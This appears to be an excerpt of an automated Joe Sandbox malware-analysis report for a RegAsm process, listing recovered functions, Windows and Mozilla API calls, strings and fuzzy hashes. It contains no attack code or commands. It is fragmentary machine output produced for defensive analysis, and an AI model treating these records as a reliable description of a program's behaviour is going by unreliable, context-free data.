VerSetConditionMask.NTDLL ref: 6C0916D7
VerSetConditionMask.NTDLL ref: 6C0916DE
VerSetConditionMask.NTDLL ref: 6C0916E5
VerSetConditionMask.NTDLL ref: 6C0916EC
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C0916F9

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersionmemset
String ID:
API String ID: 375572348-0
Opcode ID: 88f3d7c650d1ccb021c5f6da7e50d2064d17683cf482954cb4306fbc7b3d4e0e
Instruction ID: 6ace51941f4a218651d2c1e4e34a7cd46c6ae2deee541176f10bdd80342c8529
Opcode Fuzzy Hash: 88f3d7c650d1ccb021c5f6da7e50d2064d17683cf482954cb4306fbc7b3d4e0e
Instruction Fuzzy Hash: 1821A2B0B403086BEB11AB658C86FBBB3BCEFD6704F444568F645AB1C0CB749E5497A1

Function 6C0DD1D0 Relevance: 10.6, APIs: 7, Instructions: 74threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C0DD1EC
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C0DD1F5

Part of subcall function 6C0DAD40: moz_malloc_usable_size.MOZGLUE(?), ref: 6C0DAE20

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C0DD211
GetCurrentThreadId.KERNEL32 ref: 6C0DD217
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C0DD226
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C0DD279
free.MOZGLUE(?), ref: 6C0DD2B2

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$freemoz_malloc_usable_size
String ID:
API String ID: 3049780610-0
Opcode ID: 64105d5b068e7cd7ff4371e01d842be8873adb7bdb10de18595bdc3cbc66e1d7
Instruction ID: 301ace6f281619233c4ecca7eaa3e1662f0f19d5f04a307ea00628593b00f23d
Opcode Fuzzy Hash: 64105d5b068e7cd7ff4371e01d842be8873adb7bdb10de18595bdc3cbc66e1d7
Instruction Fuzzy Hash: 982159757043059BCB04DF64C488AAEB7F1FF8A324F11462EE51A87740DB30A909CB96

Function 6C0CF5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C0BCBE8: GetCurrentProcess.KERNEL32(?,6C0831A7), ref: 6C0BCBF1
Part of subcall function 6C0BCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0831A7), ref: 6C0BCBFA

Part of subcall function 6C0C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C094A68), ref: 6C0C945E
Part of subcall function 6C0C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C0C9470
Part of subcall function 6C0C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C0C9482
Part of subcall function 6C0C9420: __Init_thread_footer.LIBCMT ref: 6C0C949F

GetCurrentThreadId.KERNEL32 ref: 6C0CF619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C0CF598), ref: 6C0CF621

Part of subcall function 6C0C94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C0C94EE
Part of subcall function 6C0C94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C0C9508

GetCurrentThreadId.KERNEL32 ref: 6C0CF637
AcquireSRWLockExclusive.KERNEL32(6C10F4B8,?,?,00000000,?,6C0CF598), ref: 6C0CF645
ReleaseSRWLockExclusive.KERNEL32(6C10F4B8,?,?,00000000,?,6C0CF598), ref: 6C0CF663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C0CF62A

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 1579816589-753366533
Opcode ID: 110a34d0896c5ede7cea4cab3a2da7f5461a865fb4243ebfbb7ee31388a3015d
Instruction ID: 59054e2948e0a1521a3a1c396517f928d6bc64ac1bc167ff681ef48885358b8a
Opcode Fuzzy Hash: 110a34d0896c5ede7cea4cab3a2da7f5461a865fb4243ebfbb7ee31388a3015d
Instruction Fuzzy Hash: 6B119175301205ABCA04AF58C949EE9B7BDFB8635DB50001AEA1583F41CF75A825CBA6

Function 6C092070 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C0BAB89: EnterCriticalSection.KERNEL32(6C10E370,?,?,?,6C0834DE,6C10F6CC,?,?,?,?,?,?,?,6C083284), ref: 6C0BAB94
Part of subcall function 6C0BAB89: LeaveCriticalSection.KERNEL32(6C10E370,?,6C0834DE,6C10F6CC,?,?,?,?,?,?,?,6C083284,?,?,6C0A56F6), ref: 6C0BABD1

LoadLibraryW.KERNEL32(combase.dll,6C091C5F), ref: 6C0920AE
GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6C0920CD
__Init_thread_footer.LIBCMT ref: 6C0920E1
FreeLibrary.KERNEL32 ref: 6C092124

Strings

combase.dll, xrefs: 6C0920A9
CoInitializeSecurity, xrefs: 6C0920C7

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoInitializeSecurity$combase.dll
API String ID: 4190559335-2476802802
Opcode ID: 869f732b38c5b8a68454cba6d0956d24af8933eaf617cbc7469488e6349ba425
Instruction ID: fc6b027b182ae6362c3e578c3330caeafd59339933c2ff55b746d30a78516480
Opcode Fuzzy Hash: 869f732b38c5b8a68454cba6d0956d24af8933eaf617cbc7469488e6349ba425
Instruction Fuzzy Hash: 2A213A76300209EFDF11CF55DC49E9A3BBAFB4A369F108018FA2492651DB31A861EF64

Function 6C0C99A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C0C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C094A68), ref: 6C0C945E
Part of subcall function 6C0C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C0C9470
Part of subcall function 6C0C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C0C9482
Part of subcall function 6C0C9420: __Init_thread_footer.LIBCMT ref: 6C0C949F

GetCurrentThreadId.KERNEL32 ref: 6C0C99C1
AcquireSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0C99CE
ReleaseSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0C99F8
GetCurrentThreadId.KERNEL32 ref: 6C0C9A05
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0C9A0D

Part of subcall function 6C0C9A60: GetCurrentThreadId.KERNEL32 ref: 6C0C9A95
Part of subcall function 6C0C9A60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0C9A9D
Part of subcall function 6C0C9A60: ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C0C9ACC
Part of subcall function 6C0C9A60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C0C9BA7
Part of subcall function 6C0C9A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C0C9BB8
Part of subcall function 6C0C9A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C0C9BC9

Part of subcall function 6C0BCBE8: GetCurrentProcess.KERNEL32(?,6C0831A7), ref: 6C0BCBF1
Part of subcall function 6C0BCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0831A7), ref: 6C0BCBFA

Strings

[I %d/%d] profiler_stream_json_for_this_process, xrefs: 6C0C9A15

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Current$ThreadTimegetenv$ExclusiveLockProcessStampV01@@Value@mozilla@@_getpid$?profiler_time@baseprofiler@mozilla@@AcquireInit_thread_footerNow@ReleaseStamp@mozilla@@TerminateV12@_
String ID: [I %d/%d] profiler_stream_json_for_this_process
API String ID: 2359002670-141131661
Opcode ID: 4ad45924db82da4de8e6866be57ec5b0288844af58599121062152cc85af008c
Instruction ID: 72807cb3afa31f44c4bed31e8344463a630b137df3eb1ae1ba95338f0d36de0d
Opcode Fuzzy Hash: 4ad45924db82da4de8e6866be57ec5b0288844af58599121062152cc85af008c
Instruction Fuzzy Hash: CB01D276B041259BDB106F299809BAE3BF8EB4225DF04401AFD1593B41CF785805E6F6

Function 6C091FA0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C0BAB89: EnterCriticalSection.KERNEL32(6C10E370,?,?,?,6C0834DE,6C10F6CC,?,?,?,?,?,?,?,6C083284), ref: 6C0BAB94
Part of subcall function 6C0BAB89: LeaveCriticalSection.KERNEL32(6C10E370,?,6C0834DE,6C10F6CC,?,?,?,?,?,?,?,6C083284,?,?,6C0A56F6), ref: 6C0BABD1

LoadLibraryW.KERNEL32(combase.dll,?), ref: 6C091FDE
GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 6C091FFD
__Init_thread_footer.LIBCMT ref: 6C092011
FreeLibrary.KERNEL32 ref: 6C092059

Strings

CoCreateInstance, xrefs: 6C091FF7
combase.dll, xrefs: 6C091FD9

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoCreateInstance$combase.dll
API String ID: 4190559335-2197658831
Opcode ID: 6f4c0a00f342cf13ef14375cb6dcbd57bbb402ef736f9d22108227bb5f948f07
Instruction ID: fe25b8739925ae9fb8a08a04eba0266551144285d1612d8ff86205122d6e8d5c
Opcode Fuzzy Hash: 6f4c0a00f342cf13ef14375cb6dcbd57bbb402ef736f9d22108227bb5f948f07
Instruction Fuzzy Hash: 98112675301204EFEF20DF15C84EF9A3BB9EB8A359B108029E92592641DF31A810EFA5

Function 6C090EE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C0BAB89: EnterCriticalSection.KERNEL32(6C10E370,?,?,?,6C0834DE,6C10F6CC,?,?,?,?,?,?,?,6C083284), ref: 6C0BAB94
Part of subcall function 6C0BAB89: LeaveCriticalSection.KERNEL32(6C10E370,?,6C0834DE,6C10F6CC,?,?,?,?,?,?,?,6C083284,?,?,6C0A56F6), ref: 6C0BABD1

LoadLibraryW.KERNEL32(combase.dll,00000000,?,6C0BD9F0,00000000), ref: 6C090F1D
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6C090F3C
__Init_thread_footer.LIBCMT ref: 6C090F50
FreeLibrary.KERNEL32(?,6C0BD9F0,00000000), ref: 6C090F86

Strings

CoInitializeEx, xrefs: 6C090F36
combase.dll, xrefs: 6C090F18

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoInitializeEx$combase.dll
API String ID: 4190559335-2063391169
Opcode ID: 0d18b55924b2990d7d673da5021e20dbb4456d1f05aa7d8598a9f55b90e9e422
Instruction ID: 1d6949d876564c2039908233d333da1289309e9b7d396e384b99cd39098a3493
Opcode Fuzzy Hash: 0d18b55924b2990d7d673da5021e20dbb4456d1f05aa7d8598a9f55b90e9e422
Instruction Fuzzy Hash: 5411A079709250DBDF40CF55C919F4A37F8EB4B329F10422DF92692B80DF30A505EA59

Function 0041FA24 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 0041FA6D
DName::operator+.LIBCMT ref: 0041FA74
DName::DName.LIBCMT ref: 0041FA96
DName::operator+.LIBCMT ref: 0041FA9D
DName::operator+.LIBCMT ref: 0041FAA4

Strings

throw(, xrefs: 0041FA65, 0041FA8E

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Name::operator+$NameName::
String ID: throw(
API String ID: 168861036-3159766648
Opcode ID: acf3c3f6b62bbe0bf60cea1499b19d7b2d2c206c409909a41351c69a4c2d4579
Instruction ID: f88cabbda18bcd4624fad7201f608a4b7bec8680ec46b3ab11068729d5ffd4ff
Opcode Fuzzy Hash: acf3c3f6b62bbe0bf60cea1499b19d7b2d2c206c409909a41351c69a4c2d4579
Instruction Fuzzy Hash: 87019B70600208BFCF14EF64D852EED77B5EF44748F10406AF905972A5DA78EA8B878C

Function 6C0CF540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C0C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C094A68), ref: 6C0C945E
Part of subcall function 6C0C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C0C9470
Part of subcall function 6C0C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C0C9482
Part of subcall function 6C0C9420: __Init_thread_footer.LIBCMT ref: 6C0C949F

GetCurrentThreadId.KERNEL32 ref: 6C0CF559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0CF561

Part of subcall function 6C0C94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C0C94EE
Part of subcall function 6C0C94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C0C9508

GetCurrentThreadId.KERNEL32 ref: 6C0CF577
AcquireSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0CF585
ReleaseSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0CF5A3

Strings

[I %d/%d] profiler_pause_sampling, xrefs: 6C0CF3A8
[I %d/%d] profiler_resume_sampling, xrefs: 6C0CF499
[I %d/%d] profiler_resume, xrefs: 6C0CF239
[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C0CF56A

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 2848912005-2840072211
Opcode ID: 28f040707fb6b59140df121d0a3e9beac935f47006cf0290a4f3b195b5122561
Instruction ID: 96523deb6e79d5d6849b387dc0ff660239ecf5b0a09c89d12be3fb7186df799a
Opcode Fuzzy Hash: 28f040707fb6b59140df121d0a3e9beac935f47006cf0290a4f3b195b5122561
Instruction Fuzzy Hash: 39F0BE76300204AFDA006B64D848E6E7BBCEB8A2ADF100019FF05C3701CF799801976A

Function 6C0CF600 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C0C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C094A68), ref: 6C0C945E
Part of subcall function 6C0C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C0C9470
Part of subcall function 6C0C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C0C9482
Part of subcall function 6C0C9420: __Init_thread_footer.LIBCMT ref: 6C0C949F

GetCurrentThreadId.KERNEL32 ref: 6C0CF619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C0CF598), ref: 6C0CF621

Part of subcall function 6C0C94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C0C94EE
Part of subcall function 6C0C94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C0C9508

GetCurrentThreadId.KERNEL32 ref: 6C0CF637
AcquireSRWLockExclusive.KERNEL32(6C10F4B8,?,?,00000000,?,6C0CF598), ref: 6C0CF645
ReleaseSRWLockExclusive.KERNEL32(6C10F4B8,?,?,00000000,?,6C0CF598), ref: 6C0CF663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C0CF62A

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 2848912005-753366533
Opcode ID: 06ebdb147ccf9672ceaa6e6518151d483ea9feb8d023d7f024e49e9b9a2ef461
Instruction ID: 75f4e99dab3a3a5faa7db4c2cdaf9fb5e066d2fb6fefb595c9c5b89b659c46a8
Opcode Fuzzy Hash: 06ebdb147ccf9672ceaa6e6518151d483ea9feb8d023d7f024e49e9b9a2ef461
Instruction Fuzzy Hash: 9CF05E76300204ABDA006B65C849E5ABBBDEB862ADF100059FE1583741CF7958059766

Function 6C090E40 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(kernel32.dll,6C090DF8), ref: 6C090E82
GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C090EA1
__Init_thread_footer.LIBCMT ref: 6C090EB5
FreeLibrary.KERNEL32 ref: 6C090EC5

Strings

GetProcessMitigationPolicy, xrefs: 6C090E9B
kernel32.dll, xrefs: 6C090E7D

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeInit_thread_footerLoadProc
String ID: GetProcessMitigationPolicy$kernel32.dll
API String ID: 391052410-1680159014
Opcode ID: e64e65ec4be5f0fe560c2ea974c167349e07525ef434d75cdab46620288aaec4
Instruction ID: 6f7198468dcd14392a8331c13aaf8a5355a7655e94b551af4f45de8a48339958
Opcode Fuzzy Hash: e64e65ec4be5f0fe560c2ea974c167349e07525ef434d75cdab46620288aaec4
Instruction Fuzzy Hash: E9014670B042C18BDF00CFA9C85EB4637F5E70AB1AF20152DD92192B80DFB5A844FA1B

Function 6C0C05F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C0BCFAE,?,?,?,6C0831A7), ref: 6C0C05FB
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C0BCFAE,?,?,?,6C0831A7), ref: 6C0C0616
strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C0831A7), ref: 6C0C061C
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C0831A7), ref: 6C0C0627

Strings

<jemalloc>, xrefs: 6C0C05FA, 6C0C060F
: (malloc) Error in VirtualFree(), xrefs: 6C0C061B, 6C0C0625

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: _writestrlen
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 2723441310-2186867486
Opcode ID: 7cc35136efe064c7c67ae24219fd4c89f3e32956b654c6fd4ed041d715d3c39b
Instruction ID: fa2bfeae03bfe38eb62065a1bd4876260b5d91a1a1f34248cfdb6fd302691d9b
Opcode Fuzzy Hash: 7cc35136efe064c7c67ae24219fd4c89f3e32956b654c6fd4ed041d715d3c39b
Instruction Fuzzy Hash: 98E08CE2A0505037F5242256AC86EBB765CDBC6674F080039FD0D83301EA8ABD1A51F6

Function 6C0D9240 Relevance: 9.3, APIs: 6, Instructions: 289timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0D9BAE
free.MOZGLUE(?,?), ref: 6C0D9BC3
free.MOZGLUE(?,?), ref: 6C0D9BD9

Part of subcall function 6C0D93B0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0D94C8
Part of subcall function 6C0D93B0: free.MOZGLUE(6C0D9281,?), ref: 6C0D94DD

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
